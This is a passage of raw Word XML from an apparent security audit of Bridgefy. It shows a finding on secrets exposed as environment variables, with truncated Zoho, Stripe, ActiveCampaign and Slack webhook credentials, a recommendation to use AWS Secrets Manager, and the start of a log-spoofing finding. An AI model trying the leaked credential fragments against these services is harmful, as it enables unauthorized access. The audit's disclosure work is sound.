                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>ZOHO_CLIENT_ID=1000.RR2[]..] </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>ZOHO_CLIENT_SECRET=705d[...]</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="2872" w:type="dxa"/>
                                  <w:gridSpan w:val="3"/>
                                  <w:tcBorders>
                                    <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                    <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:ind w:left="0"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Times New Roman"/>
                                      <w:sz w:val="12"/>
                                    </w:rPr>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="235" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="3761" w:type="dxa"/>
                                  <w:gridSpan w:val="3"/>
                                  <w:tcBorders>
                                    <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="203" w:lineRule="exact"/>
                                    <w:ind w:left="0"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:color w:val="959895"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>ZOHO_REDIRECT_URL=https://bridgefy.me</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="3862" w:type="dxa"/>
                                  <w:gridSpan w:val="3"/>
                                  <w:tcBorders>
                                    <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="203" w:lineRule="exact"/>
                                    <w:ind w:left="-1"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>ZOHO_AUTHORIZATION_CODE=1000.08ae4[...]</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="891" w:type="dxa"/>
                                  <w:vMerge w:val="restart"/>
                                  <w:tcBorders>
                                    <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                                  </w:tcBorders>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:ind w:left="0"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Times New Roman"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="210" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="3167" w:type="dxa"/>
                                  <w:gridSpan w:val="2"/>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="191" w:lineRule="exact"/>
                                    <w:ind w:left="0"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>ZOHO_REFRESH_TOKEN=1000.031[...]</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4456" w:type="dxa"/>
                                  <w:gridSpan w:val="4"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:ind w:left="0"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Times New Roman"/>
                                      <w:sz w:val="14"/>
                                    </w:rPr>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="891" w:type="dxa"/>
                                  <w:vMerge/>
                                  <w:tcBorders>
                                    <w:top w:val="nil"/>
                                  </w:tcBorders>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:rPr>
                                      <w:sz w:val="2"/>
                                      <w:szCs w:val="2"/>
                                    </w:rPr>
                                  </w:pPr>
                                </w:p>
                              </w:tc>
                            </w:tr>
                          </w:tbl>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                            </w:pPr>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape style="position:absolute;margin-left:105pt;margin-top:1.626592pt;width:431.55pt;height:71pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:15772160" type="#_x0000_t202" id="docshape84" filled="false" stroked="false">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:tbl>
                      <w:tblPr>
                        <w:tblW w:w="0" w:type="auto"/>
                        <w:jc w:val="left"/>
                        <w:tblInd w:w="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69"/>
                        <w:gridCol w:w="198"/>
                        <w:gridCol w:w="594"/>
                        <w:gridCol w:w="1881"/>
                        <w:gridCol w:w="100"/>
                        <w:gridCol w:w="1881"/>
                        <w:gridCol w:w="891"/>
                      </w:tblGrid>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="242" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="5742" w:type="dxa"/>
                            <w:gridSpan w:val="5"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:ind w:left="0"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman"/>
                                <w:sz w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="2772" w:type="dxa"/>
                            <w:gridSpan w:val="2"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="210" w:lineRule="exact"/>
                              <w:ind w:left="-3"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>STRIPEKEY=sk_test_EwMlg[...]</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="204" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="2969" w:type="dxa"/>
                            <w:tcBorders>
                              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="184" w:lineRule="exact"/>
                              <w:ind w:left="0"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>STRIPESIGNING=whsec_ZTdwF[...]</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="5545" w:type="dxa"/>
                            <w:gridSpan w:val="6"/>
                            <w:tcBorders>
                              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="184" w:lineRule="exact"/>
                              <w:ind w:left="98"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:color w:val="959895"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>STATSWEBHOOK=https://hooks.slack.com/servi[...]</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="197" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="3167" w:type="dxa"/>
                            <w:gridSpan w:val="2"/>
                            <w:tcBorders>
                              <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="177" w:lineRule="exact"/>
                              <w:ind w:left="0"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>ACTIVECAMPAIGNKEY=f54fb38d1[..]]</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="5347" w:type="dxa"/>
                            <w:gridSpan w:val="5"/>
                            <w:tcBorders>
                              <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="177" w:lineRule="exact"/>
                              <w:ind w:left="98"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:color w:val="959895"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>ACTIVECAMPAIGNURL=https://bridgefy.api-</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:color w:val="959895"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>us1.com</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="197" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="5642" w:type="dxa"/>
                            <w:gridSpan w:val="4"/>
                            <w:tcBorders>
                              <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="177" w:lineRule="exact"/>
                              <w:ind w:left="0"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>ZOHO_CLIENT_ID=1000.RR2[]..] </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>ZOHO_CLIENT_SECRET=705d[...]</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="2872" w:type="dxa"/>
                            <w:gridSpan w:val="3"/>
                            <w:tcBorders>
                              <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:ind w:left="0"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman"/>
                                <w:sz w:val="12"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="235" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="3761" w:type="dxa"/>
                            <w:gridSpan w:val="3"/>
                            <w:tcBorders>
                              <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="203" w:lineRule="exact"/>
                              <w:ind w:left="0"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:color w:val="959895"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>ZOHO_REDIRECT_URL=https://bridgefy.me</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="3862" w:type="dxa"/>
                            <w:gridSpan w:val="3"/>
                            <w:tcBorders>
                              <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="203" w:lineRule="exact"/>
                              <w:ind w:left="-1"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>ZOHO_AUTHORIZATION_CODE=1000.08ae4[...]</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="891" w:type="dxa"/>
                            <w:vMerge w:val="restart"/>
                            <w:tcBorders>
                              <w:top w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
                            </w:tcBorders>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:ind w:left="0"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="210" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="3167" w:type="dxa"/>
                            <w:gridSpan w:val="2"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="191" w:lineRule="exact"/>
                              <w:ind w:left="0"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>ZOHO_REFRESH_TOKEN=1000.031[...]</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4456" w:type="dxa"/>
                            <w:gridSpan w:val="4"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:ind w:left="0"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman"/>
                                <w:sz w:val="14"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="891" w:type="dxa"/>
                            <w:vMerge/>
                            <w:tcBorders>
                              <w:top w:val="nil"/>
                            </w:tcBorders>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="2"/>
                                <w:szCs w:val="2"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                    </w:tbl>
                    <w:p>
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="none"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FBDATABASEURL=https://bridgefy-sdk-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>staging.firebaseio.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to store sensitive data using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>KMS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>encryption within </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>AWS Secrets Manager. </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The values should then be passed as environment variables during task execution, using a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ValueFrom </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>keyword that fetches secrets from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Secrets Manager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>179</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. The proposed approach prevents access by low-privileged users. Additionally, passing the data as environment variables during task execution removes the need to store sensitive data in the docker image itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="224"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487630848">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>303876</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="113" name="Graphic 113"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="113" name="Graphic 113"/>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23.927246pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15685632;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape85" coordorigin="1440,479" coordsize="2880,0" path="m1440,479l4320,479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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>179</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="70"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId267">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://aws.amazon.com/premiumsupport/knowledge-center/ecs-data-security-container-task/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250016" w:id="39"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-039</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Spoofing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>ECS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="37751C"/>
